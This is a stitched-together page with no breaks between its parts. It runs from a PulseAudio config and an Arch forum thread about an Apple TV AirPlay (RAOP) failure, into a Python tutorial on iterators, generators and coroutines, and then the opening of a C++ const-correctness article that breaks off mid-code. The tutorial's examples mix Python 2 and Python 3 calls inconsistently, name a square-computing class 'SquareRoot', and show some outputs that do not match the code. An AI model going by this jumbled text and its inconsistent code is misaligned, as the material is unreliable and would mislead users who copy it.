### Make sure we always have a sink around, even if it is a null sink.
load-module module-always-sink

### Honour intended role device property
load-module module-intended-roles

### Automatically suspend sinks/sources that become idle for too long
load-module module-suspend-on-idle

### If autoexit on idle is enabled we want to make sure we only quit
### when no local session needs us anymore.
.ifexists module-console-kit.so
.nofail
load-module module-console-kit
.fail
.endif
.ifexists module-systemd-login.so
load-module module-systemd-login
.endif

### Enable positioned event sounds
load-module module-position-event-sounds

### Cork music/video streams when a phone stream is active
load-module module-role-cork

### Modules to allow autoloading of filters (such as echo cancellation)
### on demand. module-filter-heuristics tries to determine what filters
### make sense, and module-filter-apply does the heavy-lifting of
### loading modules and rerouting streams.
load-module module-filter-heuristics
load-module module-filter-apply

### Load DBus protocol
.ifexists module-dbus-protocol.so
load-module module-dbus-protocol
.endif

# X11 modules should not be started from default.pa so that one daemon
# can be shared by multiple sessions.

### Load X11 bell module
#load-module module-x11-bell sample=bell-windowing-system

### Register ourselves in the X11 session manager
#load-module module-x11-xsmp

### Publish connection data in the X11 root window
#.ifexists module-x11-publish.so
#.nofail
#load-module module-x11-publish
#.fail
#.endif

load-module module-switch-on-port-available

### Make some devices default
#set-default-sink output
#set-default-source input

load-module module-equalizer-sink
Please tell me what other information I can provide to help figure this out. I'm still figuring out the sound architecture so, it is quite possible I'm missing something obvious.
Thanks,
Andy
Last edited by PowerTap (2013-01-25 04:39:53)
I do not use AirPlay and hence can't answer your question, but the way in which this question was asked makes it unsuitable for the Newbie Corner, even if you ARE very recent to Arch. Lots of detail and trouble-shooting already done, so I'm moving to the Multimedia Forum.
Also, the pulseaudio mailing list would probably be a better place for this question if no one answers you here.
EDIT: now I realize I forgot my pulseaudio troubleshooting 101 - please kill and restart pulseaudio with -vvvv
Last edited by ngoonee (2013-01-14 07:45:55)

Did some more reading/working on this based on what I've found here, and I've produced some more extensive logging in order to help figure things out.
I think probably the problem is related to these warnings:
( 0.419| 0.322) D: [pulseaudio] module-raop-discover.c: Found RAOP: Apple TV
( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'txtvers' with value: '1'
( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'ch' with value: '2'
( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'cn' with value: '0,1,2,3'
( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'da' with value: 'true'
( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'et' with value: '0,3,5'
( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'ft' with value: '0xA7FCA00'
( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'md' with value: '0,1,2'
( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'pw' with value: 'false'
( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'pk' with value: 'd23d01bf7a1c392b6d15bb3a870a3624bd018f70c99ab44e00346651ca340a29'
( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'sv' with value: 'false'
( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'sr' with value: '44100'
( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'ss' with value: '16'
( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'tp' with value: 'UDP'
( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'vn' with value: '65537'
( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'vs' with value: '150.35'
( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'vv' with value: '1'
( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'am' with value: 'AppleTV2,1'
( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'sf' with value: '0x4'
( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Loading module-raop-sink with arguments 'server=[192.168.1.2]:5000 sink_name=raop.Apple-TV.local sink_properties='device.description="Apple TV"''
( 0.423| 0.003) I: [pulseaudio] sink.c: Created sink 2 "raop.Apple-TV.local" with sample spec s16le 2ch 44100Hz and channel map front-left,front-right
( 0.423| 0.003) I: [pulseaudio] sink.c: device.string = "[192.168.1.2]:5000"
( 0.423| 0.003) I: [pulseaudio] sink.c: device.intended_roles = "music"
( 0.423| 0.003) I: [pulseaudio] sink.c: device.description = "Apple TV"
( 0.423| 0.003) I: [pulseaudio] sink.c: device.icon_name = "audio-card"
( 0.424| 0.000) D: [pulseaudio] core-subscribe.c: Dropped redundant event due to change event.
( 0.424| 0.000) I: [pulseaudio] source.c: Created source 2 "raop.Apple-TV.local.monitor" with sample spec s16le 2ch 44100Hz and channel map front-left,front-right
( 0.424| 0.000) I: [pulseaudio] source.c: device.description = "Monitor of Apple TV"
( 0.424| 0.000) I: [pulseaudio] source.c: device.class = "monitor"
( 0.424| 0.000) I: [pulseaudio] source.c: device.icon_name = "audio-input-microphone"
( 0.424| 0.000) D: [pulseaudio] rtsp_client.c: Attempting to connect to server '192.168.1.2:5000'
( 0.424| 0.000) D: [raop-sink] module-raop-sink.c: Thread starting up
( 0.425| 0.000) D: [pulseaudio] protocol-dbus.c: Interface org.PulseAudio.Core1.Device added for object /org/pulseaudio/core1/source2
( 0.425| 0.000) D: [pulseaudio] protocol-dbus.c: Interface org.PulseAudio.Core1.Source added for object /org/pulseaudio/core1/source2
( 0.425| 0.000) D: [pulseaudio] module-device-restore.c: Could not set format on sink raop.Apple-TV.local
( 0.425| 0.000) D: [pulseaudio] module-suspend-on-idle.c: Sink raop.Apple-TV.local becomes idle, timeout in 5 seconds.
( 0.425| 0.000) D: [pulseaudio] protocol-dbus.c: Interface org.PulseAudio.Core1.Device added for object /org/pulseaudio/core1/sink2
( 0.425| 0.000) D: [pulseaudio] protocol-dbus.c: Interface org.PulseAudio.Core1.Sink added for object /org/pulseaudio/core1/sink2
( 0.425| 0.000) I: [pulseaudio] module.c: Loaded "module-raop-sink" (index: #30; argument: "server=[192.168.1.2]:5000 sink_name=raop.Apple-TV.local sink_properties='device.description="Apple TV"'").
( 0.426| 0.000) D: [pulseaudio] protocol-dbus.c: Interface org.PulseAudio.Core1.Module added for object /org/pulseaudio/core1/module30
( 0.620| 0.194) D: [pulseaudio] rtsp_client.c: Established RTSP connection from local ip 192.168.1.12
( 0.620| 0.000) D: [pulseaudio] raop_client.c: RAOP: CONNECTED
( 0.621| 0.000) D: [pulseaudio] rtsp_client.c: Sending command: ANNOUNCE
( 0.629| 0.007) D: [pulseaudio] rtsp_client.c: Full response received. Dispatching
( 0.629| 0.000) D: [pulseaudio] raop_client.c: RAOP: ANNOUNCED
( 0.629| 0.000) D: [pulseaudio] rtsp_client.c: Sending command: SETUP
( 0.639| 0.010) W: [pulseaudio] rtsp_client.c: Unexpected response: RTSP/1.0 500 Internal Server Error
( 0.639| 0.000) W: [pulseaudio] rtsp_client.c: Unexpected response: Content-Length: 0
( 0.639| 0.000) W: [pulseaudio] rtsp_client.c: Unexpected response: Server: AirTunes/150.35
( 0.639| 0.000) W: [pulseaudio] rtsp_client.c: Unexpected response: CSeq: 2
( 0.639| 0.000) W: [pulseaudio] rtsp_client.c: Unexpected response:
( 5.094| 4.454) I: [pulseaudio] module-suspend-on-idle.c: Sink combined.equalizer idle for too long, suspending ...
( 5.094| 0.000) D: [pulseaudio] sink.c: Suspend cause of sink combined.equalizer is 0x0004, suspending
( 5.094| 0.000) D: [combine] sink-input.c: Requesting rewind due to corking
Also, the Apple TV is running version 5.1.1, if that helps at all.
Again thanks for any help that I can get.
The problem is that Pulseaudio's RAOP module only supports streaming over TCP, whereas the Apple TV (and most other AirPlay receivers) only supports UDP streams (see the AirTunes spec).
Since Pulseaudio doesn't send the expected header during the SETUP phase (instead, since it only supports TCP streams, it sends "Transport: RTP/AVP/TCP;..."), the AppleTV responds with a server error - which you can see in your log.
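To illustrate the mismatch (this is my own sketch; the exact header strings are assumptions based on the log above, not copied from the Pulseaudio source), the difference comes down to the Transport header in the RTSP SETUP request:

```python
# Sketch of the RTSP SETUP Transport headers involved (illustrative only;
# the literal strings are assumptions, not taken from Pulseaudio's code).

# What Pulseaudio's RAOP module sends: a TCP interleaved transport.
pulseaudio_setup = "Transport: RTP/AVP/TCP;unicast;interleaved=0-1;mode=record"

# What an AirPlay receiver such as the Apple TV expects: a UDP transport
# with client-chosen control and timing ports (port numbers invented here).
airplay_setup = ("Transport: RTP/AVP/UDP;unicast;mode=record;"
                 "control_port=6001;timing_port=6002")

# The receiver rejects the TCP variant, which matches the
# "RTSP/1.0 500 Internal Server Error" seen in the log above.
print(pulseaudio_setup)
print(airplay_setup)
```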
Unfortunately, until someone adds UDP support to Pulseaudio's RAOP module, you (and I) are probably out of luck.
Edit: Just discovered RAOP Play, which seems to support UDP; might give this a try later.
Edit2: There's also pulseaudio-raop2, which is a Pulseaudio module for RAOP over UDP.
Last edited by Whatever (2013-01-20 15:34:18)
Different Programming Paradigms
There are several approaches to computer programming used to solve similar tasks, and some of them are better suited to specific tasks than others. The most prevalent ones are:
Procedural Programming
This type of programming is a list of instructions coded by the programmer and followed strictly by the computer. Many C examples can be seen as procedural (C can be used to program in other paradigms as well, but the language was designed with procedural programming in mind). C++ and Python can be used to program in a procedural style.
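A minimal Python sketch of the procedural style (the task and names here are my own illustration, not from the article):

```python
# Procedural style: an explicit list of instructions the computer follows,
# with mutable local state updated step by step.
def average(numbers):
    total = 0
    count = 0
    for n in numbers:   # step through the data, one instruction at a time
        total += n
        count += 1
    return total / count

print(average([1, 2, 3, 4]))  # 2.5
```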
Declarative Programming
In this paradigm, programming becomes an activity of describing the problem you are trying to solve instead of telling the computer how to solve it. The most famous example of a declarative programming language is SQL. The programmer doesn't tell the SQL engine whether to use indexes, scan the table, or which sub-clause to execute first; the engine decides what is more efficient.
Object-Oriented Programming
In object orientation, programs are interactions of objects which have internal states; interactions are performed as messages passed from object to object. C++ and Python support object orientation, but they don't restrict the programmer to this single paradigm. Java is strictly object-oriented (well, kind of). Smalltalk is (really) strictly object-oriented.
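A small Python sketch of that idea (the classes and names are my own illustration): objects hold internal state and interact by invoking each other's methods, i.e. passing messages.

```python
# Object-oriented style: state lives inside objects; behaviour is invoked
# by sending messages (method calls) between them.
class Account:
    def __init__(self, balance):
        self.balance = balance      # internal state

    def deposit(self, amount):
        self.balance += amount

class Customer:
    def __init__(self, account):
        self.account = account

    def pay_in(self, amount):
        self.account.deposit(amount)  # a message from Customer to Account

acc = Account(100)
Customer(acc).pay_in(50)
print(acc.balance)  # 150
```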
Functional Programming
In the functional paradigm, internal state is largely avoided, so that a function call's output depends only on its parameters. It is then no surprise that functional programming languages have functions as first-class language constructs. Functions as described above are called purely functional. In practice, purely functional routines are mixed with non-purely functional ones, and in some cases global variables are used or side effects are caused as well. C++, Python, Java, Scala, and many other languages can be used to program in a functional way.
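To make the purity distinction concrete, here is a small sketch (my own example): a pure function's output depends only on its inputs, while an impure one reads and mutates external state.

```python
# Pure: output depends only on the parameters; no external state touched.
def pure_add(x, y):
    return x + y

# Impure: the result depends on (and mutates) a global variable.
counter = 0
def impure_add(x):
    global counter
    counter += x            # side effect
    return counter

assert pure_add(2, 3) == pure_add(2, 3)   # always 5, call after call
print(impure_add(2), impure_add(2))       # 2 4 -- same input, different output
```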
The above categories are just a rough cut, and they don't constitute solid distinctions. In fact, the opposite of declarative programming is imperative programming. Functional and logic programming can be seen as declarative because they avoid side effects and the programmer doesn't have complete control over how the algorithm used is actually implemented.
Characteristics of Functional Programming
Functional programming facilitates five major qualities of both theoretical and practical importance:
Formal Provability – to some degree, proving a program correct is easier when no side effects are present, because before- and after-constraints can be formulated more easily (side effects may make it impossible to formulate after-constraints, for example).
Modularity – functional programs are assemblies of small functions because functions are the unit of work, which results in largely modular programs.
Composability – it is easier to build a library in the functional paradigm because constraints are largely well defined, especially in the absence of side effects.
Testing and Debugging – it is easier to test functional programs because of modularity and composability.
Productivity – in many cases (according to many people's experiences) functional programs are far shorter than procedural and object-oriented ones.
Python for Functional Programming
One of the most important constructs in Python functional programming is the iterator.
Iterators
Iterators are objects that represent data streams; these streams can be finite or infinite. The Python iterator protocol requires an object to have a method named next() (__next__() in Python 3) that takes no arguments and returns the next element in the data stream. The next() method must raise a StopIteration exception when there are no more elements in the stream. An object is iterable if it is an iterator or if an iterator for it can be obtained, for example, by the built-in function iter(). Built-in iterable objects include dictionaries and lists. Note that the Python iterator protocol supports only going in the forward direction; going backward, however, can be implemented.
l = [1, 2, 3]  # a list
it = iter(l)   # acquire an iterator for the list
it.next()      # outputs: 1
it.next()      # outputs: 2
it.next()      # outputs: 3
it.next()      # raises: StopIteration
Iterable objects are expected in for loops:
for e in l:
    print(e)
# outputs:
# 1
# 2
# 3
is equivalent to:
for e in iter(l):
    print(e)
The reverse operation can be carried out as well - lists or tuples can be constructed from iterables:

l = [1, 2, 3]
it = iter(l)
tuple(it)  # (1, 2, 3)
Note that constructing a list or a tuple from an iterator drains the iterator and causes it to raise StopIteration on the next call to the iterator's next() method.

l = [1, 2, 3]
it = iter(l)
tuple(it)   # creates: (1, 2, 3); use list(it) for a list [1, 2, 3]
it.next()   # raises: StopIteration
This also means that if you try to construct a list out of a drained iterator, you get an empty list.
l = [1, 2, 3]
it = iter(l)
tuple(it)  # (1, 2, 3)
list(it)   # []
Sequence unpacking supports iterators as well.
a, b, c = iter(l)  # or a, b, c = l
print(a, b, c)     # outputs: 1 2 3
Several built-in functions accept iterators as parameters.
max(iter(l))  # outputs: 3
min(iter(l))  # outputs: 1
# or equivalently
max(l)
min(l)
The in and not in operators also support iterators. Note that because iterators can be infinite, problems arise if you supply such an iterator to max(), min(), or not in; the same holds for in if the item is not in the stream. In these cases, the call will never return.
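A small sketch of that pitfall (my own example, using itertools): membership tests on an endless stream only terminate if the item is actually found; bounding the stream first makes the test safe.

```python
import itertools

# itertools.count() yields 0, 1, 2, ... forever.
# This returns True quickly, because 5 appears early in the stream:
print(5 in itertools.count())   # True

# But `-1 in itertools.count()` would never return, since the search can
# only move forward through an endless stream -- so it is left commented out:
# -1 in itertools.count()

# A safe alternative is to bound the stream first:
print(-1 in itertools.islice(itertools.count(), 100))  # False
```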
Dictionary Iterators
Dictionaries support multiple types of iterators. The basic one, obtained by keys(), iterates over the dictionary keys.
d = { 'a': 1, 'b': 2, 'c': 3 }
for key in d.keys():  # or d.iterkeys() for Python 2
    print(key)
# outputs:
# a
# b
# c
keys() (iterkeys() in Python 2) is actually the default iterator for dictionaries, so the following can be done:
d = dict(a = 1, b = 2, c = 3)
for k in d:  # same as: for k in d.keys() or for k in iter(d)
    print(d[k])
# outputs:
# 1
# 2
# 3
Note that in Python 2, dict.keys() returns a list of keys, not an iterator. (The moves package provides compatibility constructs between different Python versions.) The other types of iterators are values() and items() in Python 3 and, respectively, itervalues() and iteritems() in Python 2. values() iterates over the values only, whilst items() iterates over key/value pairs.
for v in d.values():
    print(v)
# outputs
# 1
# 2
# 3

for k, v in d.items():
    print(k, v)
# outputs
# a 1
# b 2
# c 3
Note that in Python 2, dict.values() returns a list of values instead of an iterator, whilst dict.items() returns a list of 2-tuples (key, value). The dict constructor accepts a finite iterator over a sequence of 2-tuples (key, value).
l = [('a', 1), ('b', 2), ('c', 3)]
d = dict(iter(l))  # or d = dict(l)
# d is equal to
# {
#   'a': 1,
#   'b': 2,
#   'c': 3
# }
Iterator Usage
Iterators can be used to achieve many tasks, but the two most common are: 1) applying a function to each element in a data stream; 2) selecting specific elements in a data stream according to some criteria. There are several ways to do just that, including the map() and filter() built-in functions.
## Python 3
d = dict(a = 1, b = 2, c = 3)
map(str.upper, d)
# outputs: <map object at 0x111987a20>
# which can be turned into a list
# if supplied to the list ctor

## Python 2
import string
d = dict(a = 1, b = 2, c = 3)
map(string.upper, d)
# outputs: ['A', 'B', 'C']
map() applies a function to each item in an iterable. Remember that the default iterator for a dictionary iterates over its keys, so in the example above, map() applies str.upper() to each key in the dictionary d and appends str.upper()'s output to the returned list.
filter() applies a predicate function to each item in an iterable, if the predicate returns a true value that item is included in the output list, otherwise it is not.
def predicate(x):
    return x < 10

filter(predicate, [1, 5, 10, 15])
# outputs: [1, 5]
These functions are great and all, but there is a more succinct way to accomplish these two tasks: list comprehensions, a mechanism that is very efficient and compact.
[x.upper() for x in d]          # equivalent to map()
# outputs: ['A', 'B', 'C']
[x for x in l if predicate(x)]  # equivalent to filter()
# outputs: [1, 5]
A list comprehension always returns a list, be it empty or otherwise. A generator expression, on the other hand, returns an iterator object.
it = (x.upper() for x in d)
it.next()  # outputs: 'A'

it = (x for x in l if predicate(x))
it.next()  # outputs: 1
The only difference in syntax is that list comprehensions use [] whilst generator expressions use (). Generators can be more useful for large data streams because a list comprehension physically constructs the whole list in memory whilst a generator doesn't.

Generators can be passed as parameters to functions that expect iterators; the rule is that the parentheses around a generator expression can be dropped if the expression constitutes a single parameter to a function that takes a single argument.
# the parameter is a generator, not a list
sum(x for x in [1, 2, 3])  # outputs: 6
Generators and list comprehension work as follows:
(expression for expr1 in sequence1 [if condition1]
            for expr2 in sequence2 [if condition2]
            for expr3 in sequence3 [if condition3]
            ...
            for exprN in sequenceN [if conditionN])
Expressions are included in the output if they are in a sequence. All if conditions are optional, but if a condition is present, an expression is only included in the output if the condition evaluates to true. Expressions are evaluated as follows: for each element in sequence1, sequence2 is iterated over from the beginning; then, for each pair (sequence1_item, sequence2_item), sequence3 is iterated over from the beginning, and so on. Hence, the sequences are not required to be of the same length, and the final number of items is the product of the number of items in all sequences. So if we have two sequences, the first with 2 items and the second with 3 items, there will be 6 items in the output iterator or list, provided that there are no false conditions.
l1 = [1, 2, 3]
l2 = [4, 5, 6]

def even(x):
    return (x % 2) == 0

[(x, y) for x in l1 for y in l2 if even(y)]
# outputs: [(1, 4), (1, 6), (2, 4), (2, 6), (3, 4), (3, 6)]
[x for x in l1 for x in l2 if even(x)]
# outputs: [4, 6, 4, 6, 4, 6]
[x for x in l1 for y in l2 if even(y)]
# outputs: [1, 1, 2, 2, 3, 3]
Introduce () if you want elements of the output list to be tuples, as in (x, y) above, to avoid syntax errors.
Iterator Object Example
An iterator object must implement the iterator protocol. There are some subtleties about iterator implementation (check PEP 234); in essence, however, it is about an object having __iter__() and next() methods. The following is a re-organised excerpt of PEP 234 about constructing an iterator class:
Container-like objects usually support protocol One. Iterators are currently required to support both protocols. The semantics of iteration come only from protocol Two; protocol One is present to make iterators behave like sequences; in particular, so that code receiving an iterator can use a for-loop over the iterator.
So, let's write an iterator class.
class SquareRoot(object):
    def __init__(self, start, end):
        self.start = start
        self.end = end
        self.current = start

    def __iter__(self):
        return self

    def next(self):
        if self.current > self.end:
            raise StopIteration
        r = self.current * self.current
        self.current += 1
        return r

    def reset(self):
        self.current = self.start
c = SquareRoot(1, 5)
c.next()  # outputs: 1
c.next()  # outputs: 4
c.next()  # outputs: 9
c.reset()
for i in c:
    print(i)
# outputs:
# 1
# 4
# 9
# 16
# 25
Generators
A usual function call always starts execution at the beginning of the body of the callee. Generators are an extension of this behavior that allows a function to be resumed at the instruction at which it was suspended. One way to implement generator behavior in a crude way is to use instance attributes to preserve the state of the function object. Another way is to use coroutines. In Python, the yield keyword allows functions to be generators: any function that contains a yield keyword is a generator. A generator function outputs an iterator instead of a single value. The next continuation of a generator starts after the yield statement that produced the current output.
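The "crude" alternative mentioned above can be sketched as follows (this class and its names are my own illustration): the resumption state lives in instance attributes instead of being kept by yield.

```python
# Preserve where-we-left-off state in instance attributes, by hand.
class SquareStream:
    def __init__(self, start, end):
        self.current = start    # the "resume point"
        self.end = end

    def __call__(self):
        if self.current > self.end:
            raise StopIteration
        r = self.current * self.current
        self.current += 1       # advance the saved state
        return r

s = SquareStream(1, 3)
print(s())  # 1
print(s())  # 4
print(s())  # 9
```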
The above SquareRoot iterator class can be written as a generator as follows:
def square_root(start, end):
    for i in range(start, end + 1):
        yield i * i
The above generator function is equivalent in all aspects to the SquareRoot iterator class except one: it cannot be reset to its initial state (except when we know what the initial state was; more about this later).
Here are more examples of generators:
def gen1():
    yield 'mentor'
    yield 'lycon'
    yield 'says hi'

list(gen1())  # outputs: ['mentor', 'lycon', 'says hi']

def generator(n):
    for i in range(n):
        yield i

g = generator(3)
g.next()  # outputs: 0
g.next()  # outputs: 1
g.next()  # outputs: 2
g.next()  # raises: StopIteration
A return statement without arguments can be used inside a generator to signal the end of execution.
def gen(n):
    if (n % 2) == 0:
        return
    for i in range(n):
        yield i
An example of an infinite generator is a generator to produce the Fibonacci sequence.
def fib():
    a, b = 0, 1
    while True:
        yield b
        a, b = b, b + a
Differences between iterators and generators can be summarized as follows:
With generators, there is no need to worry about the iterator protocol.
Generators are one-time operations, once the generator is exhausted you have to construct another.
Iterator objects may be used for iteration several times without a need to reconstruct them (a list, for example).
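That last difference can be demonstrated with a small sketch (my own example): a generator is a one-shot stream, while a list can hand out fresh iterators forever.

```python
def squares(n):
    for i in range(1, n + 1):
        yield i * i

g = squares(3)
print(list(g))  # [1, 4, 9]
print(list(g))  # [] -- the generator is exhausted; build a new one to reuse

l = [1, 4, 9]
print(list(iter(l)))  # [1, 4, 9]
print(list(iter(l)))  # [1, 4, 9] -- a fresh iterator any time
```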
Generator Interaction
Generators are not only callables that take parameters, like regular functions; they also allow callers to pass values to them in the middle of execution. This feature requires Python >= 2.5. To pass a value into a generator, use g.send(val), where g is a generator object. The following is an example of a generator that is ready to accept a value during execution:
def gen():
    i = 0
    while i < 10:
        val = (yield)
        if val is None:
            i += 1
        else:
            i = val
Note that it is in principle no different from the previous generators we encountered; the differences are:

- val is assigned a value from a yield expression.
- We use parentheses around yield.
In Python 2.5, yield became an expression, so we can use it like any other right-hand expression. We have to prepare for val being None, because val is going to be None except when send() is used with a value other than None. The parentheses around yield are not always required, but it is easier to always include them, because the cases where they may be omitted are easily overlooked. In short, you can forgo the parentheses only if the yield is at the top level of the right-hand expression (look at PEP 342 for details).
With the above generator, we can do the following:
g = gen()
k = 0
l = []
for i in g:
    k += 1
    l.append(k)
# l is equal to [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
Notice the following:
g = gen()
g.next()   # outputs: None
g.send(8)  # outputs: None
g.next()   # outputs: None
g.next()   # raises: StopIteration
We can also do this using the same iterator:
g = gen()
g.next()   # outputs: None
g.send(8)  # outputs: None
g.next()   # outputs: None
g.send(8)  # outputs: None
g.next()   # outputs: None
g.next()   # raises: StopIteration
This clearly shows that we can control the execution of a generator insofar as values sent via send() control its execution. Let's try a tiny variation on the same generator:
def gen():
    i = 0
    while i < 10:
        val = (yield i)  # <-- change is here
        if val is None:
            i += 1
        else:
            i = val
Running the same code above produces the following instead:
g = gen()
g.next()   # outputs: 0
g.send(8)  # outputs: 8
g.next()   # outputs: 9
g.next()   # raises: StopIteration
And as we did before:
g = gen()
g.next()   # outputs: 0
g.send(8)  # outputs: 8
g.next()   # outputs: 9
g.send(8)  # outputs: 8
g.next()   # outputs: 9
g.next()   # raises: StopIteration
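The parentheses rule discussed above can be seen in a small Python 3 sketch (the names here are my own):

```python
def accumulator():
    total = 0
    while True:
        # yield is the entire right-hand side here, so the
        # parentheses may be dropped:
        val = yield total
        if val is not None:
            # as part of a larger expression it would have to be
            # parenthesised, e.g. total += (yield total)
            total += val

a = accumulator()
next(a)           # prime the generator; outputs 0
print(a.send(5))  # 5
print(a.send(2))  # 7
```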
A yield statement can be used for both input and output. In addition to send(), generator objects have close() and throw(type, value=None, traceback=None) methods; see the generator method documentation in the Python documentation for the details of how these raise exceptions at the suspension point in the generator's code.
For close(), clean-up code may be best put in a finally clause (or, in some cases, in an except clause).
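A small sketch of that advice (my own example): close() raises GeneratorExit inside the generator, so a finally clause is a natural place for clean-up code.

```python
cleaned = []

def resource_user():
    try:
        while True:
            yield "working"
    finally:
        # runs when close() raises GeneratorExit inside the generator
        cleaned.append(True)

g = resource_user()
print(next(g))  # working
g.close()       # triggers GeneratorExit; the finally clause runs
print(cleaned)  # [True]
```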
Generators in that sense are coroutines. They are very nice as pipelines: they can be stacked on top of each other to simulate Unix pipelining, for example, with all the advantages of the generator's memory handling and its ability to process infinite streams. They can also implement producer/consumer patterns. As coroutines, they can be used to implement pseudo-concurrency (pseudo-threads), where one thread schedules a (theoretically) infinite number of execution units (check greenlets and Gevent if you are interested; we will cover that later on).
Generators in Practice
Let's have a look at an example. In this example, we will parse the HTML returned from a Web page, capitalize every word found and reverse it. Capitalized words will be stored in a list and reversed words will be stored in another list.
import string
from urllib.request import urlopen
from html.parser import HTMLParser

def producer(words, *consumers):
    for c in consumers:
        c.next()          # prime each consumer (next(c) in Python 3)
    for w in words:
        for c in consumers:
            c.send(w)

def consumer1(container):
    while True:
        w = (yield)
        container.append(w.upper())

def consumer2(container):
    while True:
        w = (yield)
        container.append(w[::-1])

class Parser(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
        self.data = []

    def handle_data(self, data):
        # note: str.translate(None, ...) is the Python 2 API
        temp = data.translate(None, string.punctuation).strip().split()
        if temp:
            for w in temp:
                self.data.append(w)

def produce(url, container1, container2):
    res = urlopen(url)
    p = Parser()
    p.feed(res.read())
    producer(p.data, consumer1(container1), consumer2(container2))
For Python 2, the imports would be:

from HTMLParser import HTMLParser
from urllib2 import urlopen
producer acts as a dispatcher, but if we route the results from the consumers back to producer, then producer can dispatch them to other processing consumers, and so on. This way, we can build a processing hub disguised as a very innocent function in a very straightforward manner.
Now let's see how we can combine two generators to capitalize and reverse a word by hand.
def reverse():
    while True:
        w = (yield)
        if w is not None:
            print(w[::-1])

def capitalise():
    g = reverse()
    g.next()
    while True:
        w = (yield)
        w = w.upper()
        g.send(w)

>>> g = capitalise()
>>> g.next()
>>> g.send('ab')
BA
Notice that BA is printed by reverse(); it is not yielded back to capitalise().
We can simplify this a bit if we introduce a decorator to start the generator automatically, so that we need not call next() upon creation.
def coroutine(func):
    def wrap(*args):
        g = func(*args)
        g.next()
        return g
    return wrap
The above code would be re-written as follows:
@coroutine
def reverse():
    while True:
        w = (yield)
        if w is not None:
            print(w[::-1])

@coroutine
def capitalise():
    g = reverse()
    while True:
        w = (yield)
        w = w.upper()
        g.send(w)

>>> g = capitalise()
>>> g.send('ab')
BA
It doesn't save much typing, but it helps to build a better abstraction. This will be used later on.
At this point, we can chain generators in the forward direction, but could we make the communication two-way? Yes, we can, and it is very simple.
def multiplier():
    w = None
    while True:
        w = (yield w * 2 if w else None)

def reverse2():
    g = multiplier(); g.next()
    w = None
    while True:
        w = (yield g.send(w[::-1]) if w else None)

def capitalise2():
    g = reverse2(); g.next()
    w = None
    while True:
        w = (yield)
        w = w.upper()
        print(g.send(w))

g = capitalise2()
g.next()
g.send('kl')  # outputs: LKLK
This is printed from inside capitalise2(). Two-way communication is actually nothing more than normal function-call semantics.
For general-purpose scenarios, however, we need pluggable components. So, let's separate the generators and call them in a row if we so desire.
@coroutine
def multiplier():
    w = None
    while True:
        w = (yield w * 2 if w else None)

@coroutine
def reverse3():
    w = None
    while True:
        w = (yield w[::-1] if w else None)

@coroutine
def capitalise3():
    w = None
    while True:
        w = (yield w.upper() if w else None)

multiplier().send(reverse3().send(capitalise3().send('ml')))
# outputs: LMLM
Note that multiplier() didn't change.
Let's have a practical example of why this programming style is helpful. Here are two functions that do the same thing, counting the number of words in a file: f1() is written in the traditional style, whilst f2() is written as a pipeline of generators.
import re

def f1(filename):
    p = re.compile(r'\s+')
    fi = open(filename)
    total = 0
    for line in fi:
        words = p.split(line)
        total += len(words)
    return total

def f2(filename):
    p = re.compile(r'\s+')
    fi = open(filename)
    words = (p.split(line) for line in fi)
    l = (len(w) for w in words)
    return sum(l)
It is easily noted that f2() is shorter and, in fact, a bit weird. Let's look at performance (make sure to read the comments afterwards), and remember: "there is a small lie, a big lie, and the benchmark." Note that benchmarking was carried out on Python 2.
Measures from cProfile (the standard Python deterministic profiler).
Performance Comments
The difference in timings for the two tables has to do with what's being measured by each method. The timings you would practically experience are the timings in the first table.
Results in the first table above are average times for function executions in a row, f1() then f2() or f2() then f1(), with each function followed by random user code.
For very small files, f1() outperforms f2(), and it seems that the generators' overhead is not compensated for by file size. For large files, it matters whether each function is run in a row or not. If we compile the regular expression for each line, then, if f1() is executed in a row with absolutely no user code in between, its execution time will grow more slowly than f2()'s. However, while possible, this is not a typical scenario outside benchmarking.
On the contrary, when random user code is executed between function invocations, f2()'s execution time remains stable whilst f1()'s execution time keeps increasing slowly.
It is important to note that, especially for large files, these functions spend more time managing memory allocation than on calculations. f2() can handle files larger than the available memory as it is; f1(), however, would require amendments, and such amendments would increase its execution time.
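To make the memory point concrete, here is a hedged sketch (the function name and the throwaway file are mine, not part of the original benchmark) of an f2-style pipeline: because the generator expression consumes the file lazily, only one line is held in memory at a time, so the same code works for files larger than RAM.

```python
import re
import tempfile

# f2-style pipeline: each line is split, counted and discarded,
# so only one line is ever held in memory at a time.
def count_words(filename):
    p = re.compile(r'\s+')
    with open(filename) as fi:
        return sum(len(p.split(line)) for line in fi)

# Tiny demonstration with a throwaway file.
with tempfile.NamedTemporaryFile('w', suffix='.txt', delete=False) as f:
    f.write("hello world\n")
    path = f.name

print(count_words(path))  # 3: 'hello', 'world' and one trailing empty split
```

Like f1() and f2() above, this counts the trailing empty string produced when a line ends with whitespace.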
Making objects or methods const has two benefits. First, the compiler will complain when you break the contract. Second, you tell the user of the interface that the function will not modify the arguments.
The C++ Core Guidelines have five rules for const, immutability, and constexpr. Here they are:
Before I dive into the rules, I have to mention one expression. When someone writes about const and immutability, you often hear the term const correctness. According to the C++ FAQ, it means:
Now, we know it. This post is about const correctness.
Okay, this rule is quite easy. You can make a value of a built-in data type or an instance of a user-defined data type const. The effect is the same. If you want to change it, you will get what you deserve: a compiler error.
struct Immutable{
